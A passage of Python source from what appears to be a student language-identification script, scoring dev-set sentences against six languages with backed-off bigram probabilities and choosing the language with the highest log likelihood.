#print("lang three bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList3:
if wordPair[0] in redistributedBigram3:
tempProbability = redistributedBigram3[wordPair[0]] *( backedOffList3[wordPair[1]] / wordCount3)
else:
tempProbability = redistributedBigram3['<UNK>'] *( backedOffList3[wordPair[1]] / wordCount3)
probSentenceGivenL3+=math.log(tempProbability)
#print("lang three backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang three bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList3:
tempUnigramBackoffList3[wordPair] += 1
else:
tempUnigramBackoffList3[wordPair] = 1
for wordPair in tempBigram4 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram4:
#print("lang four bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
normalizingConstant = (series4[wordPair[0]])
tempProbability = (backedOffBigram4[wordPair])/(normalizingConstant)
probSentenceGivenL4+=math.log(tempProbability)
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList4:
if wordPair[0] in redistributedBigram4:
tempProbability = redistributedBigram4[wordPair[0]] *( backedOffList4[wordPair[1]] / wordCount4)
else:
tempProbability = redistributedBigram4['<UNK>'] *( backedOffList4[wordPair[1]] / wordCount4)
probSentenceGivenL4+=math.log(tempProbability)
#print("lang four backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang four bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList4:
tempUnigramBackoffList4[wordPair] += 1
else:
tempUnigramBackoffList4[wordPair] = 1
for wordPair in tempBigram5 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram5:
normalizingConstant = (series5[wordPair[0]])
tempProbability = (backedOffBigram5[wordPair])/(normalizingConstant)
probSentenceGivenL5+=math.log(tempProbability)
#print("lang five bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList5:
if wordPair[0] in redistributedBigram5:
tempProbability = redistributedBigram5[wordPair[0]] *( backedOffList5[wordPair[1]] / wordCount5)
else:
tempProbability = redistributedBigram5['<UNK>'] *( backedOffList5[wordPair[1]] / wordCount5)
probSentenceGivenL5+=math.log(tempProbability)
#print("lang five backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang five bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList5:
tempUnigramBackoffList5[wordPair] += 1
else:
tempUnigramBackoffList5[wordPair] = 1
for wordPair in tempBigram6 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram6:
normalizingConstant = (series6[wordPair[0]])
tempProbability = (backedOffBigram6[wordPair])/(normalizingConstant)
probSentenceGivenL6+=math.log(tempProbability)
#print("lang six bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList6:
if wordPair[0] in redistributedBigram6:
tempProbability = redistributedBigram6[wordPair[0]] *( backedOffList6[wordPair[1]] / wordCount6)
else:
tempProbability = redistributedBigram6['<UNK>'] *( backedOffList6[wordPair[1]] / wordCount6)
probSentenceGivenL6+=math.log(tempProbability)
#print("lang six backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang six bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList6:
tempUnigramBackoffList6[wordPair] += 1
else:
tempUnigramBackoffList6[wordPair] = 1
#redistribute the probabilities that had to be backed off twice.
#print("Now redistributing unigram backoff as necessary.\n")
#First need to count number of oov types
numOOVTypes1 = len(tempUnigramBackoffList1)
numOOVTypes2 = len(tempUnigramBackoffList2)
numOOVTypes3 = len(tempUnigramBackoffList3)
numOOVTypes4 = len(tempUnigramBackoffList4)
numOOVTypes5 = len(tempUnigramBackoffList5)
numOOVTypes6 = len(tempUnigramBackoffList6)
#print(numOOVTypes1)
#print(numOOVTypes2)
#print(numOOVTypes3)
#print(numOOVTypes4)
#print(numOOVTypes5)
#print(numOOVTypes6)
#then need to get b/v values where V is the size of the total vocab of known and previously unknown newly encountered words
#b is the probability mass set aside for redistribution
distValueUnigram1 = redistributedUnigram1/(numOOVTypes1+sizeOfVocab1)
distValueUnigram2 = redistributedUnigram2/(numOOVTypes2+sizeOfVocab2)
distValueUnigram3 = redistributedUnigram3/(numOOVTypes3+sizeOfVocab3)
distValueUnigram4 = redistributedUnigram4/(numOOVTypes4+sizeOfVocab4)
distValueUnigram5 = redistributedUnigram5/(numOOVTypes5+sizeOfVocab5)
distValueUnigram6 = redistributedUnigram6/(numOOVTypes6+sizeOfVocab6)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList1.items():
if key[0] in redistributedBigram1:
tempProbabilitySum = value * math.log(redistributedBigram1[key[0]]*distValueUnigram1)
else:
tempProbabilitySum = value * math.log(redistributedBigram1['<UNK>']*distValueUnigram1)
probSentenceGivenL1+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList2.items():
#tempProbabilitySum = math.log(distValueUnigram2)
if key[0] in redistributedBigram2:
tempProbabilitySum = value * math.log(redistributedBigram2[key[0]]*distValueUnigram2)
else:
tempProbabilitySum = value * math.log(redistributedBigram2['<UNK>']*distValueUnigram2)
probSentenceGivenL2+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList3.items():
#tempProbabilitySum = math.log(distValueUnigram3)
if key[0] in redistributedBigram3:
tempProbabilitySum = value * math.log(redistributedBigram3[key[0]]*distValueUnigram3)
else:
tempProbabilitySum = value * math.log(redistributedBigram3['<UNK>']*distValueUnigram3)
probSentenceGivenL3+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList4.items():
#tempProbabilitySum = math.log(distValueUnigram4)
if key[0] in redistributedBigram4:
tempProbabilitySum = value * math.log(redistributedBigram4[key[0]]*distValueUnigram4)
else:
tempProbabilitySum = value * math.log(redistributedBigram4['<UNK>']*distValueUnigram4)
probSentenceGivenL4+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList5.items():
#tempProbabilitySum = math.log(distValueUnigram5)
if key[0] in redistributedBigram5:
tempProbabilitySum = value * math.log(redistributedBigram5[key[0]]*distValueUnigram5)
else:
tempProbabilitySum = value * math.log(redistributedBigram5['<UNK>']*distValueUnigram5)
probSentenceGivenL5+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList6.items():
#tempProbabilitySum = math.log(distValueUnigram6)
if key[0] in redistributedBigram6:
tempProbabilitySum = value * math.log(redistributedBigram6[key[0]]*distValueUnigram6)
else:
tempProbabilitySum = value * math.log(redistributedBigram6['<UNK>']*distValueUnigram6)
probSentenceGivenL6+=(tempProbabilitySum)
#print("Now predicting language\n")
#predict which language it is using logs
logProb1 = probSentenceGivenL1 + math.log(probLang1)
logProb2 = probSentenceGivenL2 + math.log(probLang2)
logProb3 = probSentenceGivenL3 + math.log(probLang3)
logProb4 = probSentenceGivenL4 + math.log(probLang4)
logProb5 = probSentenceGivenL5 + math.log(probLang5)
logProb6 = probSentenceGivenL6 + math.log(probLang6)
#store probabilities in dictionary with respective languages as keys
probDict = {
"Lang1": logProb1,
"Lang2": logProb2,
"Lang3": logProb3,
"Lang4": logProb4,
"Lang5": logProb5,
"Lang6": logProb6
}
#find maximum of these log likelihoods and set that as the predicted language
Keymax = max(probDict, key=probDict.get)
#for debugging
#print(Keymax)
predictedLang.append(str(Keymax))
#append the actual language this dev set is from to actual language list
actualLang.append('Lang1')
countDevLang1+=1
#print("Done with %d sentences in dev set for Lang 1\n"%(countDevLang1))
#resetting the temporary list of words per each sentence
tempSentence1 = []
tempSentence2 = []
tempSentence3 = []
tempSentence4 = []
tempSentence5 = []
tempSentence6 = []
#for debugging adding a break
#break
tempSentence1 = []
tempSentence2 = []
tempSentence3 = []
tempSentence4 = []
tempSentence5 = []
tempSentence6 = []
en_dev1.close()
#connlu parse and update bigram and unigram counts
for tokenlist in parse_incr(en_dev2):
##for debugging
#print(tokenlist)
#for storing values that will later have redistributed unigram probability
tempUnigramBackoffList1 = {}
tempUnigramBackoffList2 = {}
tempUnigramBackoffList3 = {}
tempUnigramBackoffList4 = {}
tempUnigramBackoffList5 = {}
tempUnigramBackoffList6 = {}
for token in tokenlist:
#If sentence is in entire vocab from all languages, add the word to the sentence. Otherwise add the unknown token to the sentence.
#Regardless, if the bigram doesn't exist in a specific language one will have laplace + 0 bigram count /unigram count+ laplace + V.
#If the unigram doesn't exist, one will have laplace + 0 bigram count / laplace + 0 + V. If the bigram exists one instead has bigram count+laplace
# divided by unigram count + laplace + V
#if not (token["form"].lower()) in wordList :
# tempSentence1.append('<UNK>')
# tempSentence2.append('<UNK>')
# tempSentence3.append('<UNK>')
# tempSentence4.append('<UNK>')
# tempSentence5.append('<UNK>')
# tempSentence6.append('<UNK>')
#else:
# ##adding to temporary sentence which will be parsed into bigrams
# #making it lower case as a means of preprocessing. words of different case but same spelling are the same type for my purposes
tempSentence1.append(token["form"].lower())
tempSentence2.append(token["form"].lower())
tempSentence3.append(token["form"].lower())
tempSentence4.append(token["form"].lower())
tempSentence5.append(token["form"].lower())
tempSentence6.append(token["form"].lower())
#now adding eos and bos tags to the sentence
tempSentence1.insert(0, "<BOS>")
tempSentence1.append("<EOS>")
tempSentence2.insert(0, "<BOS>")
tempSentence2.append("<EOS>")
tempSentence3.insert(0, "<BOS>")
tempSentence3.append("<EOS>")
tempSentence4.insert(0, "<BOS>")
tempSentence4.append("<EOS>")
tempSentence5.insert(0, "<BOS>")
tempSentence5.append("<EOS>")
tempSentence6.insert(0, "<BOS>")
tempSentence6.append("<EOS>")
#this is math.log(1) since I am adding log probabilities to avoid multiplication
probSentenceGivenL1 = 0
probSentenceGivenL2 = 0
probSentenceGivenL3 = 0
probSentenceGivenL4 = 0
probSentenceGivenL5 = 0
probSentenceGivenL6 = 0
#for zipping to bigram tuples
tempBigram1 = zip(tempSentence1, islice(tempSentence1, 1, None))
tempBigram2 = zip(tempSentence2, islice(tempSentence2, 1, None))
tempBigram3 = zip(tempSentence3, islice(tempSentence3, 1, None))
tempBigram4 = zip(tempSentence4, islice(tempSentence4, 1, None))
tempBigram5 = zip(tempSentence5, islice(tempSentence5, 1, None))
tempBigram6 = zip(tempSentence6, islice(tempSentence6, 1, None))
#for debugging
#print(tempBigram1)
for wordPair in tempBigram1 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram1:
normalizingConstant = (series1[wordPair[0]])
tempProbability = (backedOffBigram1[wordPair])/(normalizingConstant)
#print("lang one bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
probSentenceGivenL1+=math.log(tempProbability)
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList1:
if wordPair[0] in redistributedBigram1:
tempProbability = redistributedBigram1[wordPair[0]] *( backedOffList1[wordPair[1]] / wordCount1)
else:
tempProbability = redistributedBigram1['<UNK>'] *( backedOffList1[wordPair[1]] / wordCount1)
probSentenceGivenL1+=math.log(tempProbability)
#print("lang one backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang one bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList1:
tempUnigramBackoffList1[wordPair] += 1
else:
tempUnigramBackoffList1[wordPair] = 1
for wordPair in tempBigram2 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram2:
normalizingConstant = (series2[wordPair[0]])
tempProbability = (backedOffBigram2[wordPair])/(normalizingConstant)
probSentenceGivenL2+=math.log(tempProbability)
#print("lang two bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList2:
if wordPair[0] in redistributedBigram2:
tempProbability = redistributedBigram2[wordPair[0]] *( backedOffList2[wordPair[1]] / wordCount2)
else:
tempProbability = redistributedBigram2['<UNK>'] *( backedOffList2[wordPair[1]] / wordCount2)
probSentenceGivenL2+=math.log(tempProbability)
#print("lang two backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang two bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList2:
tempUnigramBackoffList2[wordPair] += 1
else:
tempUnigramBackoffList2[wordPair] = 1
for wordPair in tempBigram3 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram3:
normalizingConstant = (series3[wordPair[0]])
tempProbability = (backedOffBigram3[wordPair])/(normalizingConstant)
probSentenceGivenL3+=math.log(tempProbability)
#print("lang three bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList3:
if wordPair[0] in redistributedBigram3:
tempProbability = redistributedBigram3[wordPair[0]] *( backedOffList3[wordPair[1]] / wordCount3)
else:
tempProbability = redistributedBigram3['<UNK>'] *( backedOffList3[wordPair[1]] / wordCount3)
probSentenceGivenL3+=math.log(tempProbability)
#print("lang three backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang three bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList3:
tempUnigramBackoffList3[wordPair] += 1
else:
tempUnigramBackoffList3[wordPair] = 1
for wordPair in tempBigram4 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram4:
#print("lang four bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
normalizingConstant = (series4[wordPair[0]])
tempProbability = (backedOffBigram4[wordPair])/(normalizingConstant)
probSentenceGivenL4+=math.log(tempProbability)
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList4:
if wordPair[0] in redistributedBigram4:
tempProbability = redistributedBigram4[wordPair[0]] *( backedOffList4[wordPair[1]] / wordCount4)
else:
tempProbability = redistributedBigram4['<UNK>'] *( backedOffList4[wordPair[1]] / wordCount4)
probSentenceGivenL4+=math.log(tempProbability)
#print("lang four backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang four bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList4:
tempUnigramBackoffList4[wordPair] += 1
else:
tempUnigramBackoffList4[wordPair] = 1
for wordPair in tempBigram5 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram5:
normalizingConstant = (series5[wordPair[0]])
tempProbability = (backedOffBigram5[wordPair])/(normalizingConstant)
probSentenceGivenL5+=math.log(tempProbability)
#print("lang five bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList5:
if wordPair[0] in redistributedBigram5:
tempProbability = redistributedBigram5[wordPair[0]] *( backedOffList5[wordPair[1]] / wordCount5)
else:
tempProbability = redistributedBigram5['<UNK>'] *( backedOffList5[wordPair[1]] / wordCount5)
probSentenceGivenL5+=math.log(tempProbability)
#print("lang five backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang five bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList5:
tempUnigramBackoffList5[wordPair] += 1
else:
tempUnigramBackoffList5[wordPair] = 1
for wordPair in tempBigram6 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram6:
normalizingConstant = (series6[wordPair[0]])
tempProbability = (backedOffBigram6[wordPair])/(normalizingConstant)
probSentenceGivenL6+=math.log(tempProbability)
#print("lang six bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList6:
if wordPair[0] in redistributedBigram6:
tempProbability = redistributedBigram6[wordPair[0]] *( backedOffList6[wordPair[1]] / wordCount6)
else:
tempProbability = redistributedBigram6['<UNK>'] *( backedOffList6[wordPair[1]] / wordCount6)
probSentenceGivenL6+=math.log(tempProbability)
#print("lang six backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang six bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList6:
tempUnigramBackoffList6[wordPair] += 1
else:
tempUnigramBackoffList6[wordPair] = 1
#redistribute the probabilities that had to be backed off twice.
#print("Now redistributing unigram backoff as necessary.\n")
#First need to count number of oov types
numOOVTypes1 = len(tempUnigramBackoffList1)
numOOVTypes2 = len(tempUnigramBackoffList2)
numOOVTypes3 = len(tempUnigramBackoffList3)
numOOVTypes4 = len(tempUnigramBackoffList4)
numOOVTypes5 = len(tempUnigramBackoffList5)
numOOVTypes6 = len(tempUnigramBackoffList6)
#print(numOOVTypes1)
#print(numOOVTypes2)
#print(numOOVTypes3)
#print(numOOVTypes4)
#print(numOOVTypes5)
#print(numOOVTypes6)
#then need to get b/v values where V is the size of the total vocab of known and previously unknown newly encountered words
#b is the probability mass set aside for redistribution
distValueUnigram1 = redistributedUnigram1/(numOOVTypes1+sizeOfVocab1)
distValueUnigram2 = redistributedUnigram2/(numOOVTypes2+sizeOfVocab2)
distValueUnigram3 = redistributedUnigram3/(numOOVTypes3+sizeOfVocab3)
distValueUnigram4 = redistributedUnigram4/(numOOVTypes4+sizeOfVocab4)
distValueUnigram5 = redistributedUnigram5/(numOOVTypes5+sizeOfVocab5)
distValueUnigram6 = redistributedUnigram6/(numOOVTypes6+sizeOfVocab6)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList1.items():
if key[0] in redistributedBigram1:
tempProbabilitySum = value * math.log(redistributedBigram1[key[0]]*distValueUnigram1)
else:
tempProbabilitySum = value * math.log(redistributedBigram1['<UNK>']*distValueUnigram1)
probSentenceGivenL1+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList2.items():
#tempProbabilitySum = math.log(distValueUnigram2)
if key[0] in redistributedBigram2:
tempProbabilitySum = value * math.log(redistributedBigram2[key[0]]*distValueUnigram2)
else:
tempProbabilitySum = value * math.log(redistributedBigram2['<UNK>']*distValueUnigram2)
probSentenceGivenL2+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList3.items():
#tempProbabilitySum = math.log(distValueUnigram3)
if key[0] in redistributedBigram3:
tempProbabilitySum = value * math.log(redistributedBigram3[key[0]]*distValueUnigram3)
else:
tempProbabilitySum = value * math.log(redistributedBigram3['<UNK>']*distValueUnigram3)
probSentenceGivenL3+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList4.items():
#tempProbabilitySum = math.log(distValueUnigram4)
if key[0] in redistributedBigram4:
tempProbabilitySum = value * math.log(redistributedBigram4[key[0]]*distValueUnigram4)
else:
tempProbabilitySum = value * math.log(redistributedBigram4['<UNK>']*distValueUnigram4)
probSentenceGivenL4+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList5.items():
#tempProbabilitySum = math.log(distValueUnigram5)
if key[0] in redistributedBigram5:
tempProbabilitySum = value * math.log(redistributedBigram5[key[0]]*distValueUnigram5)
else:
tempProbabilitySum = value * math.log(redistributedBigram5['<UNK>']*distValueUnigram5)
probSentenceGivenL5+=(tempProbabilitySum)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList6.items():
#tempProbabilitySum = math.log(distValueUnigram6)
if key[0] in redistributedBigram6:
tempProbabilitySum = value * math.log(redistributedBigram6[key[0]]*distValueUnigram6)
else:
tempProbabilitySum = value * math.log(redistributedBigram6['<UNK>']*distValueUnigram6)
probSentenceGivenL6+=(tempProbabilitySum)
#print("Now predicting language\n")
#predict which language it is using logs
logProb1 = probSentenceGivenL1 + math.log(probLang1)
logProb2 = probSentenceGivenL2 + math.log(probLang2)
logProb3 = probSentenceGivenL3 + math.log(probLang3)
logProb4 = probSentenceGivenL4 + math.log(probLang4)
logProb5 = probSentenceGivenL5 + math.log(probLang5)
logProb6 = probSentenceGivenL6 + math.log(probLang6)
#store probabilities in dictionary with respective languages as keys
probDict = {
"Lang1": logProb1,
"Lang2": logProb2,
"Lang3": logProb3,
"Lang4": logProb4,
"Lang5": logProb5,
"Lang6": logProb6
}
#find maximum of these log likelihoods and set that as the predicted language
Keymax = max(probDict, key=probDict.get)
#for debugging
#print(Keymax)
predictedLang.append(str(Keymax))
#append the actual language this dev set is from to actual language list
actualLang.append('Lang2')
countDevLang2+=1
#print("Done with %d sentences in dev set for Lang 2\n"%(countDevLang2))
#resetting the temporary list of words per each sentence
tempSentence1 = []
tempSentence2 = []
tempSentence3 = []
tempSentence4 = []
tempSentence5 = []
tempSentence6 = []
#for debugging adding a break
#break
tempSentence1 = []
tempSentence2 = []
tempSentence3 = []
tempSentence4 = []
tempSentence5 = []
tempSentence6 = []
en_dev2.close()
#connlu parse and update bigram and unigram counts
for tokenlist in parse_incr(en_dev3):
##for debugging
#print(tokenlist)
#for storing values that will later have redistributed unigram probability
tempUnigramBackoffList1 = {}
tempUnigramBackoffList2 = {}
tempUnigramBackoffList3 = {}
tempUnigramBackoffList4 = {}
tempUnigramBackoffList5 = {}
tempUnigramBackoffList6 = {}
for token in tokenlist:
#If sentence is in entire vocab from all languages, add the word to the sentence. Otherwise add the unknown token to the sentence.
#Regardless, if the bigram doesn't exist in a specific language one will have laplace + 0 bigram count /unigram count+ laplace + V.
#If the unigram doesn't exist, one will have laplace + 0 bigram count / laplace + 0 + V. If the bigram exists one instead has bigram count+laplace
# divided by unigram count + laplace + V
#if not (token["form"].lower()) in wordList :
# tempSentence1.append('<UNK>')
# tempSentence2.append('<UNK>')
# tempSentence3.append('<UNK>')
# tempSentence4.append('<UNK>')
# tempSentence5.append('<UNK>')
# tempSentence6.append('<UNK>')
#else:
# ##adding to temporary sentence which will be parsed into bigrams
# #making it lower case as a means of preprocessing. words of different case but same spelling are the same type for my purposes
tempSentence1.append(token["form"].lower())
tempSentence2.append(token["form"].lower())
tempSentence3.append(token["form"].lower())
tempSentence4.append(token["form"].lower())
tempSentence5.append(token["form"].lower())
tempSentence6.append(token["form"].lower())
#now adding eos and bos tags to the sentence
tempSentence1.insert(0, "<BOS>")
tempSentence1.append("<EOS>")
tempSentence2.insert(0, "<BOS>")
tempSentence2.append("<EOS>")
tempSentence3.insert(0, "<BOS>")
tempSentence3.append("<EOS>")
tempSentence4.insert(0, "<BOS>")
tempSentence4.append("<EOS>")
tempSentence5.insert(0, "<BOS>")
tempSentence5.append("<EOS>")
tempSentence6.insert(0, "<BOS>")
tempSentence6.append("<EOS>")
#this is math.log(1) since I am adding log probabilities to avoid multiplication
probSentenceGivenL1 = 0
probSentenceGivenL2 = 0
probSentenceGivenL3 = 0
probSentenceGivenL4 = 0
probSentenceGivenL5 = 0
probSentenceGivenL6 = 0
#for zipping to bigram tuples
tempBigram1 = zip(tempSentence1, islice(tempSentence1, 1, None))
tempBigram2 = zip(tempSentence2, islice(tempSentence2, 1, None))
tempBigram3 = zip(tempSentence3, islice(tempSentence3, 1, None))
tempBigram4 = zip(tempSentence4, islice(tempSentence4, 1, None))
tempBigram5 = zip(tempSentence5, islice(tempSentence5, 1, None))
tempBigram6 = zip(tempSentence6, islice(tempSentence6, 1, None))
#for debugging
#print(tempBigram1)
for wordPair in tempBigram1 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram1:
normalizingConstant = (series1[wordPair[0]])
tempProbability = (backedOffBigram1[wordPair])/(normalizingConstant)
#print("lang one bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
probSentenceGivenL1+=math.log(tempProbability)
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList1:
if wordPair[0] in redistributedBigram1:
tempProbability = redistributedBigram1[wordPair[0]] *( backedOffList1[wordPair[1]] / wordCount1)
else:
tempProbability = redistributedBigram1['<UNK>'] *( backedOffList1[wordPair[1]] / wordCount1)
probSentenceGivenL1+=math.log(tempProbability)
#print("lang one backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang one bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList1:
tempUnigramBackoffList1[wordPair] += 1
else:
tempUnigramBackoffList1[wordPair] = 1
for wordPair in tempBigram2 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram2:
normalizingConstant = (series2[wordPair[0]])
tempProbability = (backedOffBigram2[wordPair])/(normalizingConstant)
probSentenceGivenL2+=math.log(tempProbability)
#print("lang two bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList2:
if wordPair[0] in redistributedBigram2:
tempProbability = redistributedBigram2[wordPair[0]] *( backedOffList2[wordPair[1]] / wordCount2)
else:
tempProbability = redistributedBigram2['<UNK>'] *( backedOffList2[wordPair[1]] / wordCount2)
probSentenceGivenL2+=math.log(tempProbability)
#print("lang two backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang two bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList2:
tempUnigramBackoffList2[wordPair] += 1
else:
tempUnigramBackoffList2[wordPair] = 1
for wordPair in tempBigram3 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram3:
normalizingConstant = (series3[wordPair[0]])
tempProbability = (backedOffBigram3[wordPair])/(normalizingConstant)
probSentenceGivenL3+=math.log(tempProbability)
#print("lang three bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList3:
if wordPair[0] in redistributedBigram3:
tempProbability = redistributedBigram3[wordPair[0]] *( backedOffList3[wordPair[1]] / wordCount3)
else:
tempProbability = redistributedBigram3['<UNK>'] *( backedOffList3[wordPair[1]] / wordCount3)
probSentenceGivenL3+=math.log(tempProbability)
#print("lang three backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang three bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList3:
tempUnigramBackoffList3[wordPair] += 1
else:
tempUnigramBackoffList3[wordPair] = 1
for wordPair in tempBigram4 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram4:
#print("lang four bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
